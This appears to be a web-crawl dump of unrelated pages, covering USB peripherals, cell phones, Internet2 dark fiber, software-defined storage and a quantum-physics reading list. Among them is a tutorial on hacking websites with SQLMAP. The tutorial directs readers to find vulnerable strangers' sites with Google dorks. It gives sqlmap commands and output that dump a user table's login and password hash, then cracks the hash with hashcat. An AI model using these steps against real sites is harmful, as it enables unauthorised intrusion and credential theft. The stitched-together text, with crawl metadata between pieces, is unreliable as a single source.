code and driver technology without incurring royalty fees. The most current version is USB 2.0, which supports data speeds up to 480 Mbps. Windows has incorporated USB drivers since 1996, and they are built into Windows 98 and all later versions. USB works well for most types of peripheral devices, including audio, video, networking, storage and more. Laundry List: Leading USB Devices USB really covers the gamut of possible applications and uses. But there are USBs that are more likely to be of use to home and office workers, especially those who must travel with laptops and other gear to take work on the road. Though there are many other categories of potential USB link-ups and gear, the following types of items can deliver functionality that’s helpful, if not essential. (The most obvious items—namely keyboards and pointing devices—are not included here, since everybody already knows about and uses them.) USB devices are available that permit PCs to be used as IP telephones. The combination of a USB headset (with earphones and a microphone) and so-called “softphone” software permits travelers to access IP phone service provider servers or Web sites, and to dial or receive calls, handle voicemail, leave messages and do anything that might ordinarily be done with a private telephone system. Numerous free softphone clients are readily available on the Internet, and many IP phone service providers make clients available to their customers at no charge. As long as your notebook or laptop can access the Internet at a reasonable speed (10 Mbps or faster is recommended), softphone software and a good headset make carrying a phone more a convenience than a necessity. As an added bonus, state-of-the-art headsets offer great audio fidelity for listening to music stored on your PC. 
For those who do carry cell phones and need the occasional charge, you also can purchase USB-attached cell phone chargers. These devices plug into a PC or notebook and grab DC power to recharge cell phone batteries. This isn't necessarily a mission-critical use for USB, but it can be convenient for those who spend too much time with a cell phone glued to their ears.

Many USB devices offer additional storage for computers of all kinds. Compact flash drives, for example, integrate a flash memory card and USB interface, and emulate drives for Windows and other operating systems. Capacities of up to 1 GB are now surprisingly affordable, with recent prices for 1 GB hovering in the $70 to $80 range. Many vendors now give 16 or 32 MB flash drives away to distribute their software rather than using CDs or diskettes. Some vendors even offer USB drives of this type that use 1-inch form-factor hard disks rather than memory cards to deliver up to 2 GB of storage in this small, convenient and highly portable format.

For larger storage volumes, many vendors—including well-known storage providers like Seagate, Maxtor, Western Digital and Iomega—offer external hard disks that provide up to 400 GB of disk space, typically for less than $300. Most of these devices incorporate standard 3.5-inch form-factor EIDE or ATA drives. Many support both high-speed USB 2.0 and Firewire (IEEE 1394) interfaces, so they run as fast as locally attached drives. Some enclosures include additional USB ports so they also can act as USB hubs (or accommodate other external drives). Many vendors bundle backup software with these drives because they're frequently used for backing systems up. Smaller form-factor drives of this type also are available—usually known as portable USB drives—specifically to make extra storage and easy backup possible for notebook and laptop users.

Those who seek to maximize their return on hardware expenses can save money by buying bare 3.5-inch EIDE or ATA drives (now available in sizes up to 400 GB, with a 200 GB drive typically available for around $100), purchasing their own external hard drive enclosures (generally available for between $40 and $80) and assembling them on their own. If you can use a screwdriver, know how to snap disk-drive cables together and can follow simple instructions, you can save up to 50 percent off the cost of an equivalent preassembled external USB drive.

USB makes everything from MP3 and other personal music players to high-end external sound cards and interfaces accessible to PCs and laptops. This kind of capability is especially useful for small form-factor PCs, notebooks and laptops, where built-in audio may not be good enough for some needs or situations, but where there's no room (or interfaces) for adding internal sound cards. It's even possible to buy special interface devices that attach to a PC through USB and connect to entertainment systems using optical, RCA or S-Video connections.

Video and Photos
Many digital video cameras and most digital cameras use USB to move photos or movies from the capture device (the camera) to a storage and editing device (the PC). Where digital cameras, music players or other devices that use compact solid-state memory cards are concerned, it's also possible to purchase USB card readers.
To get photos from your camera to your PC, remove the memory card from the camera, plug it into the reader and use your local file system to copy the image files from the card to a hard drive (or vice versa) and to delete unwanted photos from the card before returning it to the camera. Six-in-one readers are commonly available for less than $10, and a 16-in-one reader costs less than $20. (A six-in-one reader can handle six different types of memory cards or sticks, whereas a 16-in-one reader handles 16 types, or nearly every such type currently available.)

Networking and Internet Links
There are lots of ways to network PCs using USB. Both wired and wireless USB-based network interfaces for various versions of Ethernet are available, including 10/100 wired Ethernet, various forms of 802.11 (b and g are the most common, at 11 and 54 Mbps respectively) and even wired or fiber-optic Gigabit Ethernet link-ups. Lots of Internet appliances (which often combine hook-ups for DSL and cable modem Internet links with wired or wireless networ
<urn:uuid:673f038a-a8ef-4021-85d8-cafc8ec89d4b>
CC-MAIN-2017-04
http://certmag.com/cool-tools-usb-desktop-peripherals-and-devices/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00196-ip-10-171-10-70.ec2.internal.warc.gz
en
0.931415
1,638
2.578125
3
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or is not strongly typed and is unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

In this guide I will show you how to use SQLMAP SQL Injection on Kali Linux to hack a website (more specifically, its database) and extract usernames and passwords.

What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make ends meet. Your actions might impact someone in a way you never wished for. I think I can't make it any clearer. So here goes:

Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step.
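Before hunting for targets, it helps to see what actually makes a page injectable in the first place. The following is a minimal, self-contained sketch, not code from any real site: it uses Python's built-in sqlite3 module and an invented users table to show the difference between building a query by string concatenation (the "incorrectly filtered" input described in the introduction) and using a parameterized query.

import sqlite3

# Toy in-memory database purely for illustration; table and column names are invented.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_login TEXT, user_password TEXT)")
conn.execute("INSERT INTO users VALUES ('userX', 'abc123')")

def lookup_vulnerable(login):
    # User input is pasted straight into the SQL string, so input can change the query's meaning.
    query = "SELECT user_login FROM users WHERE user_login = '" + login + "'"
    return conn.execute(query).fetchall()

def lookup_safe(login):
    # A placeholder keeps the input as data, never as SQL syntax.
    return conn.execute(
        "SELECT user_login FROM users WHERE user_login = ?", (login,)
    ).fetchall()

print(lookup_vulnerable("' OR '1'='1"))   # [('userX',)]  every row comes back: injectable
print(lookup_safe("' OR '1'='1"))         # []            input treated as data, not SQL

try:
    lookup_vulnerable("'")                 # a lone quote breaks the SQL syntax...
except sqlite3.OperationalError as err:
    print("SQL error leaked to the page:", err)   # ...the tell-tale error the quote test below looks for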
Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.

Step 1.a: Google Dork strings to find vulnerable, SQL-injectable websites
This list is really long; it took me a long time to collect them. If you know SQL, then you can add more. Put them in the comment section and I will add them here.

[The original post includes a three-column table of Google Dork search strings here; the table contents did not survive extraction.]

Step 1.b: Initial check to confirm if a website is vulnerable to SQLMAP SQL Injection
For every string shown above, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways, and I am sure people would argue about which one is best, but to me the following is the simplest and most conclusive.

Let's say you searched using the string inurl:item_id= and one of the search results shows a website like this:

Just add a single quotation mark ' at the end of the URL. (Just to be clear, " is a double quotation mark and ' is a single quotation mark.) So now your URL will become like this:

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results. See the example error below in the screenshot. I've obscured everything including URL and page design for obvious reasons.

Examples of SQLi errors from different databases and languages

Microsoft SQL Server
Server Error in '/' Application. Unclosed quotation mark before the character string 'attack;'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.

MySQL
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12

Oracle
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL
Query failed: ERROR: unterminated quoted string at or near "'''"

Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I've found a website vulnerable to SQLMAP SQL Injection. Now I need to list all the databases behind it (this is also called enumerating the databases). As I am using SQLMAP, it will also tell me which parameter is vulnerable. Run the following command against the vulnerable URL:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

sqlmap = name of the sqlmap binary
-u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = enumerate DBMS databases

See the screenshot below.
This command reveals quite a bit of interesting information:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So we now have two databases that we can look into. information_schema is a standard database on almost every MySQL server, so our interest is in the sqldummywebsite database.

Step 3: List tables of the target database using SQLMAP SQL Injection
Now we need to know how many tables the sqldummywebsite database has and what their names are. To find out, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database has 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

Of course we want to check what's inside the user_info table, as that table probably contains usernames and passwords.

Step 4: List columns of the target table using SQLMAP SQL Injection
Now we need to list all the columns of the user_info table in the sqldummywebsite database. SQLMAP makes it really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from the target table user_info.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for: the target columns user_login and user_password.

Step 5: List usernames from the target column using SQLMAP SQL Injection
SQLMAP makes this easy! Just run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what: we now have the username from the database.

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there; we now only need the password for this user, and the next step shows just that.

Step 6: Extract the password from the target column using SQLMAP SQL Injection
You're probably getting used to how the SQLMAP SQL Injection tool works by now. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can't be someone's password; someone who leaves their website vulnerable like that just can't have a password like that. That is exactly right: this is a hashed password. What that means is that the stored value is a one-way hash, and we now need to crack it rather than read it directly. I have covered how to crack password hashes extensively in the Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you've missed it, you're missing out on a lot. I will cover it briefly here, but you should really learn how to use hashcat.

Step 7: Cracking the password
So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?

Step 7.a: Identify the hash type
Luckily, Kali Linux provides a hash identification tool; run it from the command line and paste in the hash value at the prompt. Excellent: so this is a DES(Unix) hash.

Step 7.b: Crack the hash using cudaHashcat
First of all, I need to know which hash-mode code to use for DES hashes, so let's check:

cudahashcat --help | grep DES

So it's either 1500 or 3100. 3100 is an Oracle hash format, and this hash came out of a MySQL-backed web application, so it must be 1500.

I am running a computer with an NVIDIA graphics card, which means I will be using cudaHashcat. On my laptop I have an AMD/ATI graphics card, so there I would use oclHashcat. If you're on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work; you must install Kali either on a persistent USB drive or on a hard disk. Instructions are on the website; search around.

I saved the hash value 24iYBc17xK0e. in a file named DES.hash. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: the usual CPU-based hashcat was unable to determine the code for this DES hash (it's not in its help menu). However, both cudaHashcat and oclHashcat found and cracked the key.

Anyhow, here's the cracked password: abc123.

24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Thanks for reading and visiting my website. There are many other ways to get into a database or obtain user information. You should only practice such techniques on websites that you have permission to test. Please share and let everyone know how to test their own websites using this technique.
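If you want to sanity-check the hash type and the cracked result yourself, here is a small illustrative Python sketch that is not part of the original walkthrough. It simply applies the traditional DES crypt(3) conventions (13 characters, the first two being the salt) to guess the type, and then re-hashes a candidate password with the same salt to confirm a crack. It relies on the standard-library crypt module, which is Unix-only, deprecated in Python 3.11 and removed in 3.13, so treat it as a sketch rather than a drop-in tool.

import re

try:
    import crypt  # Unix-only; deprecated in Python 3.11 and removed in 3.13
except ImportError:
    crypt = None

DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")  # 2-char salt + 11-char digest

def looks_like_des_crypt(h):
    # Traditional DES crypt hashes are exactly 13 characters from the crypt
    # alphabet, with no "$id$" prefix (unlike $1$ md5crypt or $6$ sha512crypt).
    return bool(DES_CRYPT_RE.match(h))

def verify_des_crypt(candidate, h):
    # Re-hash the candidate with the hash's own two-character salt and compare.
    if crypt is None:
        raise RuntimeError("crypt module unavailable on this platform")
    return crypt.crypt(candidate, h[:2]) == h

dumped_hash = "24iYBc17xK0e."  # the value sqlmap pulled out above
print(looks_like_des_crypt(dumped_hash))         # True -> consistent with DES(Unix)
print(verify_des_crypt("abc123", dumped_hash))   # True only if the cracked password is correct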
<urn:uuid:417c329e-96ab-4b2c-ab0e-e56514198c70>
CC-MAIN-2017-04
https://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00014-ip-10-171-10-70.ec2.internal.warc.gz
en
0.659938
3,402
2.625
3
Cell phones have brought a drastic change to almost everybody's way of communicating. They have become an integral part of people's lives and have influenced them in many ways. Cell phones are now so popular and necessary that, for most people, it is hard to get by without one. It is a thing of the past, back when cell phones were newly launched, that they were just another means of communication. In today's technologically advanced era, cell phones are more than just a source of communication.

When cell phones were introduced, people were excited because they were mobile. They gave users the flexibility to talk wherever and whenever they wanted. Unlike traditional phones, users could carry them along. These were some of the big reasons why cell phones caught on with a large number of consumers and became their first choice. But the scene is far different today than in the past. Cell phones have become very common because of their mobility and have become more than a necessity. It would not be an exaggeration to say that cell phones now shape how people run their daily lives.

The world has become technologically advanced and everything today is getting hi-tech. The era of working with paper and pencil has gone. Today, most people prefer to save their personal information on PCs or on their cell phones rather than keeping it in a diary. Cell phones are designed to be multipurpose. Apart from allowing users to communicate, they also let users save important information, store personal contacts and access the internet. In fact, cell phones have become mini computers: users can browse the web on them and carry various types of important information with them.

Cell phones have really changed people's lives a great deal. Not just that: cell phones have added style to people's lives, personalities and ways of communicating, and they are considered the most stylish means of communication. Cell phones have enabled multitasking and also let users hold conference calls. No matter where people are or what they are doing, they can handle various tasks while talking at the same time.

On the whole, cell phones have done a good job of bringing people closer and keeping them in touch with their families and friends. They have brought convenience to people's lives and have done more than one can ever realize. Cell phones are a delightful invention.
<urn:uuid:ad0f9a7e-feb9-44a0-bc27-f46c8d0bc44b>
CC-MAIN-2017-04
http://www.setelecom.ca/blog/2011/06/cell-phones-provide-a-stylish-way-of-communication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00224-ip-10-171-10-70.ec2.internal.warc.gz
en
0.982523
566
2.671875
3
As we progress further into the era of web-based everything, there can be no denying that the networks supporting this explosion of networked interaction will be due for an innovative revamp. This is where the Internet2 initiative enters the picture. The Internet2 initiative is a gathering of minds dedicated to advancing networking applications and technologies. The consortium is working with the Energy Sciences Network (ESNet), which provides data connections for universities and institutions, to develop experiments on top of dormant networking resources collectively called "dark fiber." While it could be several years before the fruits of their networking research extend to the masses, the teams are working on two prototype networks, including one that promises data transfer rates in the 100 gigabit per second range. To put that in context, Google is one of the companies on the cutting edge of this speedy network system with its announcement that it is building a 1 gigabit per second network for one of its communities.

As Robert Vietzke, Internet2's director of network services, told Technology Review, "When you want to do something disruptive, when you want to try something really radical, you can't do that on a network that people are trying to actually use. At the same time, it's useful to test these ideas on real network infrastructure." Vietzke says that in the past this kind of research required network researchers to buy spools of fiber, install them in a lab setting, and try with all their might to recreate the conditions a national network would face. Dark fiber eliminates these purchases and the difficulty of simulating mega-networks by allowing them to use a large-scale network with real traffic.

Dark fiber refers to a rather extensive network of fiber that is lying unused, much of which had been purchased for next to nothing following the dot-com bubble burst. Internet2 and ESNet have leased this fiber for the next 20 years to work on their 100 gigabit per second network, which is a separate network that is left dark and open to whatever equipment and protocols researchers want to bring to it.
<urn:uuid:375c52e7-8a54-4a26-8071-996f3d47a1d7>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/07/25/new_hope_for_dark_fiber/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00224-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956257
423
2.75
3
The Storage Networking Industry Association recently hosted an industry summit, "The Future of Computing – The Convergence of Memory and Storage through Non-Volatile Memory (NVM)." For a glimpse into the future, from some of the industry's true thought leaders, check out the presentations [ZIP] and audio recordings [ZIP]. This view into the rapid developments in flash memory and other NVM technologies has given me a new-found appreciation for the concept of a software-defined data center (SDDC).

SDN and the implications for storage
Infrastructure managers who believe in the promise of software-defined data centers are beginning to see storage as the final piece of a puzzle that includes virtualization and SDN. However, this is only possible if the storage infrastructure itself can be separated into:
- software that controls and manages data, and
- infrastructure that stores, copies and retrieves that data.

In short, storage needs to have its own control and data planes, each working seamlessly as an extension of the storage infrastructure. There are several reasons to separate the control plane and liberate the storage control software from the hardware. Here's one: software-defined storage allows offloading the computationally heavy aspects of storage-management-related functions—like RDMA protocol handling, advanced data lifecycle management, caching, and compression. The availability of large amounts of CPU power within private and public clouds opens all kinds of possibilities for both network and storage management. Those options were simply not feasible before. With more intelligence built into the control plane, storage architects are now able to take full advantage of two major changes in the data plane.

1. Optimizing performance for non-volatile memory
The first change involves advancements in NVM technology—both the increasing affordability of solid-state memory such as flash, and the new capabilities promised by next-generation storage technologies such as PCM and STT-RAM. Phase Change Memory (PCM) and spin-transfer torque random-access memory (STT-RAM) have the access speeds and byte-addressable characteristics of the DRAM used in today's servers. But, like flash, they also have the transformational benefit of solid-state persistence. These prototype technologies are hugely more expensive than flash is today, but it is predicted that one of them will eventually surpass even the cheapest forms of flash memory. But don't ask me which horse to back!

Regardless of which technology wins, the trends are clear: within a few years, the majority of a server's storage performance requirements will be served from some form of solid-state cache storage within the server itself. When this is combined with new network technology and software that thrives in a distributed architecture, it has major implications for storage design and implementation. Imagine how your infrastructure would change if every server had terabytes of super-fast solid-state memory connected together via ultra-low-latency, intelligent networking. The fact is that many of the reasons we implement shared storage for mission-critical applications today would simply disappear. Apart from niche applications, this vision is still a long way off, but this is where our industry is heading.

2. Optimizing capacity for really large disk drives
The second major change is the demand to store and process massive amounts of data, which increases as we are able to extract more value from that data through Big Data analysis.
This coincides with a dramatic reduction in the cost of storing that data. Very high density SATA drives, with capacities in excess of 10 TB per disk, are coming. But in order to surpass some hard, quantum-physics-level limitations, they will use new storage techniques—such as shingled writes—and will be built optimally to store, but never overwrite or erase, data. This means the storage characteristics at the data plane will be fundamentally different from those we are familiar with today. Furthermore, even with these improvements in the cost and density of magnetic disk, the economics of power consumption and data center real estate mean that tape is becoming attractive again for long-term archival storage.

Finally, think about the economies of scale that large cloud providers have and the availability of the massive computing power they are able to place in close proximity to that data. This means those cloud providers will have a compelling value proposition for storing a large proportion of an organization's cold data. Regardless of where and how this data is stored, the challenges of securing and finding that data, and of managing the lifecycles of this massive amount of information, mean that traditional methods of using files, folders and directories simply won't be viable. New access and management techniques built on top of object-based access to data, such as Amazon's S3 and the open-standards-based CDMI interfaces, will be the management and data-access protocols of choice.

In the end, the only way to effectively combine the speed and performance of solid-state storage with the scale and price advantages of capacity-optimized storage is by using a software-defined storage infrastructure. It is the intelligence of a separate control plane, powered by commodity CPU, that will allow infrastructure managers and data center architects to take advantage of these two massive trends.
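To make the object-based access mentioned above a little more concrete, here is a short illustrative sketch using the boto3 library against an S3-style API. The bucket name, keys and metadata are invented for illustration, and credentials are assumed to be configured elsewhere; the point is simply that data is addressed by bucket, key and metadata rather than by files, folders and directories.

import boto3

# Assumes AWS (or S3-compatible) credentials are already configured
# via environment variables or ~/.aws/credentials.
s3 = boto3.client("s3")

BUCKET = "example-archive-bucket"  # hypothetical bucket name

# Store an object: the "path" is just a key string, not a directory tree.
s3.put_object(
    Bucket=BUCKET,
    Key="projects/2013/report.pdf",
    Body=open("report.pdf", "rb"),
    Metadata={"department": "engineering", "retention": "7y"},  # lifecycle hints
)

# Retrieve it again by bucket + key.
obj = s3.get_object(Bucket=BUCKET, Key="projects/2013/report.pdf")
data = obj["Body"].read()

# Enumerate objects by key prefix instead of walking folders.
listing = s3.list_objects_v2(Bucket=BUCKET, Prefix="projects/2013/")
for item in listing.get("Contents", []):
    print(item["Key"], item["Size"])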
<urn:uuid:0aeb9bda-b9ab-4c72-8a7e-a4f447c90562>
CC-MAIN-2017-04
http://www.computerworld.com/article/2475927/data-storage-solutions/the-future-of-storage-is-software-defined.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00132-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927561
1,070
2.515625
3
Philosophers have often claimed that the 19th-century view of the world as a deterministic mechanism is naïve. Recent discoveries in physics have shown this view not only to be naïve but also to be false, in the sense that it leads to predictions that are directly contradicted by an impressive sequence of accepted experimental results. Any hypothesis that claims to describe the world as it really is, as opposed to the world as it is observed, either leads to no testable predictions or to predictions that are seen to be false. The key problem addressed by almost all of the books listed is that of reality. While we tend to speak of reality as "things as they really are", science seems to be restricted to "things as we observe them". The challenge to the 19th-century views has come from two sources: Einstein's theory of relativity and (primarily) quantum mechanics. As quantum mechanics and its extensions present the most direct challenge to the classical views of reality, most of the books in this list are popularizations of the main ideas of quantum theory, without the complicated mathematics.

1. Farewell to Reality: How Modern Physics Has Betrayed the Search for Scientific Truth, by Jim Baggott, Pegasus Books, ©2013, ISBN 9 – 781605 – 985749.
Despite this book's fascination with what it calls "fairy-tale physics", it presents a good discussion of the current state of theoretical physics. It presents the problem of reality and tries to relate it to direct observations. What can we say about what we cannot observe? It then moves to the study of light and other microscopic phenomena, focusing on the experiments that led to quantum mechanics. There is a chapter on the basic structure of matter, followed by a discussion of the special and general theories of relativity and the impact of these theories on observations. The main focus of the book is found in the second part, which presents the idea of "fairy-tale" physics as a collection of theories that might be aesthetically pleasing but lead to no predictions that can be directly observed. Is a quark real if you can never see one?

2. Quantum Reality: Beyond the New Physics, an Excursion into Metaphysics, by Nick Herbert, Anchor Books, ©1987, ISBN 9 – 78035 – 235693.
This book presents physics (and all of science) as an attempt to characterize, rationalize, and predict "things as we observe them", and metaphysics (especially ontology) as the study of "things as they really are" without regard to observables. It describes the search for reality and then immediately jumps to the challenges presented by quantum mechanics to knowing "things as they really are". It then discusses two problems: the quantum measurement problem (why don't we see quantum effects in the macroscopic world?) and "spooky action at a distance" (quantum entanglement). One interesting feature of this book is that it, more than the previous book, simply explains a number of experiments that totally demolish all "common sense" theories of how the world operates on the sub-microscopic level. The small amount of math in the book can be skipped without loss.

3. Quantum: Einstein, Bohr, and the Great Debate about the Nature of Reality, by Manjit Kumar, W. W. Norton and Company, ©2008, ISBN 9 – 780393 – 078299.
An exploration of the scientific and philosophical development of quantum theory, written almost in the fashion of a collection of biographies.
There are a lot of personal stories told, such as the time that Bohr and Einstein tried to take the trolley to the Copenhagen Institute of Physics but continually missed their stop because of their animated conversations. The "plot" of the book leads up to a long debate between Einstein and Bohr over the nature of reality and a thought experiment posed by Einstein that vexed Bohr to his death in 1962. This was quantum entanglement, which Einstein called "spooky action at a distance". A test to establish the existence of quantum entanglement was proposed by John Bell in 1964 and rigorously carried out in 1982. Of particular interest to me is the story of Werner Heisenberg's difficult and almost agonizing time leading to the development of his uncertainty principle. That hypothesis seems to have been an act of desperation.

4. The Age of Entanglement: When Quantum Physics Was Reborn, by Louisa Gilder, Alfred A. Knopf, ©2009, ISBN 978 – 1 – 4000 – 4417 – 7.
This book presents a collection of essays describing the events leading up to the debate between Bohr and Einstein over quantum entanglement. It covers the famous EPR (Einstein, Podolsky, and Rosen) experiment, which was thought to be untestable until John Bell set out the theoretical approach in 1964. As in the previous book, the (not overly) technical articles are accompanied by numerous personal stories. One example was Albert Einstein's response to the proposition that quantum entities do not exist independently of being observed: "Do you really believe the moon is not there if nobody looks?"

5. The Structure of Scientific Revolutions, by Thomas S. Kuhn, Third Edition, The University of Chicago Press, ©1996, ISBN 978 – 0 – 226 – 45808 – 3.
This book is the classic investigation of how scientific theories evolve (Kuhn would not use the word "progresses"). While it does mention quantum mechanics, that is only one of the theories considered. Kuhn focuses on paradigms (have you heard of "paradigm shift"? Kuhn popularized the term) as a collection of assumptions, practices, and attitudes surrounding any theory. Kuhn's thesis is that a theory and its associated paradigm come into existence when enough evidence has been accumulated to create a formal statement, and that the theory then continues its life as "normal science", in which scientists attempt to expand the theory and explore its predictions experimentally. Eventually a theory might suffer anomalies, which are problems that the theory cannot allow or explain. The anomalies either are handled by expansion of the theory (as when the discovery of Neptune resolved the anomalies in the orbit of Uranus) or a crisis occurs and a new paradigm emerges (as when quantum theory provided explanations of the photoelectric effect). Kuhn's work is a ground-breaking effort, and, as such, contains both many good ideas and many attempts to push the approach a bit too far. Most scientists agree that Kuhn's basic principles are sound.

The following references are to audio and video courses published by The Teaching Company, 4151 Lafayette Center Drive, Suite 100, Chantilly, VA 20151-1232, 1-800-832-2412.

6. Philosophy of Science, by Jeffrey L. Kasser, Course No. 4100, ©2006, marketed by The Teaching Company. (www.teach12.com)
This is a strictly philosophical series, with science as its subject. It begins with an attempt to define the term "science" as opposed to a pseudo-science, such as astrology. It spends a long time on observation and how such observations give rise to theories.
It covers the roles of discovery and explanation in science, and attempts to describe what a natural law might be, as opposed to an accidental generalization. This course covers a lot of philosophy, but presents it clearly and simply. 7. Science Wars: What Scientists Know and How They Know It, by Steven L. Goldman, Course No. 1235, ©2006, marketed by The Teaching Company. (www.teach12.com) This course begins by discussing the work of Plato (428 – 348 BCE) on the problems of knowledge and truth. How do scientists come about knowledge and how do they use this to produce theories? Is it valid to call any theory true? Again, a lot of philosophy, but well presented. 8. Quantum Mechanics: The Physics of the Microscopic World by Benjamin Course No. 1240, ©2009, marketed by The Teaching Company. (www.teach12.com) The best thing about this course is the explanation of the many solid experiments leading to the establishment of quantum mechanics and the discrediting of its competitors. Each experiment is well explained with particular attention to how the well–established results violate common sense. This is a video course with great visuals. It contains almost no mathematics.
<urn:uuid:fa750ecb-36a9-481f-a4ae-bd9b635c961c>
CC-MAIN-2017-04
http://www.edwardbosworth.com/Talks/ScienceLogicAndBelief_Biblography.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00398-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924034
1,867
2.796875
3
